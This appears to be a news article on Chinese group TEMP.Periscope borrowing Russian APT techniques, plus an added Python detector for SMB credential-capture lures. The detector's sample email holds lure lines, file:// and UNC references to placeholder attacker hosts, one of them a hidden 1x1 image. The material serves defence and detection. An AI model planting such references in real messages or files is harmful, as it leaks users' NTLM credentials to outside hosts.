Attribution of cyber attacks is always hard; in many cases attackers plant false flags to disguise their identities.
Chinese hackers have targeted a UK-based engineering company using techniques and artifacts attributed to the Russia-linked APT groups Dragonfly and APT28, according to security researchers.
Threat intelligence experts from Recorded Future discovered that the Chinese threat actor TEMP.Periscope was using TTPs associated with Russian APT groups in an attempt to complicate attribution. The same campaign that targeted the U.K.-based engineering company also hit a freelance journalist based in Cambodia, and the attackers used command-and-control infrastructure previously used by the TEMP.Periscope APT group.
“Employees of a U.K.-based engineering company were among the targeted victims of a spearphishing campaign in early July 2018. The campaign also targeted an email address possibly belonging to a freelance journalist based in Cambodia who covers Cambodian politics, human rights, and Chinese development.” reads the analysis published by Recorded Future.
“We believe both attacks used the same infrastructure as a reported campaign by Chinese threat actor TEMP.Periscope (also known as Leviathan), which targeted Cambodian entities in the run-up to their July 2018 elections. Crucially, TEMP.Periscope’s interest in the U.K. engineering company they targeted dates back to attempted intrusions in May 2017.”
The attackers used the domain scsnewstoday[.]com as their C2, the same domain used in a recent TEMP.Periscope campaign targeting the Cambodian government.
The spear-phishing messages were sent by using the popular Chinese email client, Foxmail.
It is interesting to note that the attackers employed a technique previously used by the Dragonfly APT group in attacks aimed at critical infrastructure: the spear-phishing message contained a “file://” path pointing at an attacker-controlled C2 server. When a Windows client follows such a path it attempts to authenticate to the remote SMB share, handing the server the user's NTLM challenge-response, which can then be cracked offline or relayed.
“A unique technique documented as a Dragonfly TTP in targeting critical infrastructure was used in the attack. The technique attempts to acquire SMB credentials using a “file://” path in the spearphish calling out to a malicious C2.” continues the analysis.
“The attack probably made use of a version of the open source tool Responder as an NBT-NS poisoner. APT28 used Responder in attacks against travelers staying at hotels in 2017.”
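The two paragraphs above describe the lure, a "file://" or UNC reference that makes a Windows client reach out over SMB, and the capture side, Responder answering NBT-NS/LLMNR lookups and collecting the resulting NTLM authentication. As an added example (not tooling from the Recorded Future report or from securityaffairs), the following Python script scans an email body for such references and classifies each target host: routable addresses and non-internal domains are flagged as external, while single-label names are flagged because they are resolved by LLMNR/NBT-NS broadcast, which is exactly what a poisoner such as Responder answers. The sample message, the `INTERNAL_SUFFIXES` allowlist and every hostname in it are constructed for this illustration.

```python
"""Flag file:// and UNC references in a spearphish that would trigger an
outbound SMB authentication from a Windows client.

Added example; hostnames and the sample message below are constructed."""
import ipaddress
import re
from html import unescape

# Assumption: DNS suffixes that belong to the recipient's own network.
INTERNAL_SUFFIXES = (".corp.example",)

# RFC 1918, loopback and link-local ranges are the only IP literals we
# treat as internal; everything else (including documentation ranges)
# is an SMB destination outside the LAN and therefore suspicious.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128")]

# file://<host>/...  A third slash (file:///C:/...) has an empty host and
# is a local path, so it does not match.
FILE_URL_RE = re.compile(r"""file://([^/\\\s"'<>]+)""", re.IGNORECASE)
# \\<host>\<share>...
UNC_RE = re.compile(r"""\\\\([^\\\s"'<>]+)\\""")


def classify_host(host):
    """Return 'internal', 'external' or 'unqualified' for a file://, UNC host."""
    h = host.lower().rstrip(".")
    if h.count(":") == 1:          # strip an explicit :port on an IPv4/DNS host
        h = h.split(":")[0]
    try:
        ip = ipaddress.ip_address(h)
        return "internal" if any(ip in net for net in INTERNAL_NETS) else "external"
    except ValueError:
        pass
    if "." not in h:
        # Single-label name: resolved via LLMNR/NBT-NS broadcast, which a
        # poisoner on the local network (e.g. Responder) can answer.
        return "unqualified"
    return "internal" if h.endswith(INTERNAL_SUFFIXES) else "external"


def find_smb_lures(body):
    """Extract every file:// URL and UNC path from an email body (HTML or text)."""
    text = unescape(body)
    hits = []
    for kind, rx in (("file_url", FILE_URL_RE), ("unc", UNC_RE)):
        for m in rx.finditer(text):
            host = m.group(1)
            hits.append({"kind": kind, "host": host,
                         "verdict": classify_host(host), "ref": m.group(0)})
    return hits


def suspicious(body):
    """Only the references that would leave the LAN or rely on broadcast name resolution."""
    return [h for h in find_smb_lures(body) if h["verdict"] != "internal"]


# Constructed sample spearphish; the hosts are placeholders, not campaign IOCs.
SAMPLE_EMAIL = """Subject: Updated drawings for the turbine housing
<html><body>
<p>Please review the revised drawings:
<a href="file://203.0.113.7/drawings/housing-rev4.pdf">housing-rev4.pdf</a></p>
<p>Old versions are on \\\\fileserver.corp.example\\projects\\turbine.</p>
<p>Shortcut: \\\\DRAWINGS\\share\\index.html</p>
<img src="file://lure.attacker-c2.example/t/px.png" width="1" height="1">
</body></html>"""

if __name__ == "__main__":
    for hit in find_smb_lures(SAMPLE_EMAIL):
        print(f"{hit['verdict']:<12} {hit['kind']:<9} {hit['host']:<30} {hit['ref']}")
```

Run against the sample, the script flags the two file:// references to non-internal hosts and the single-label UNC name, and leaves the fileserver.corp.example share alone. A 1x1 image with a file:// source is the quiet variant: a mail client that renders remote content will authenticate without the user clicking anything, so the scan should cover `src` attributes, not only links.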
The same UK engineering company had already been targeted by TEMP.Periscope in May 2017; months later the group also hit US engineering and academic entities.
“Recorded Future expects TEMP.Periscope to continue to target organisations in the high-tech defence and engineering sectors,” concludes the report. – securityaffairs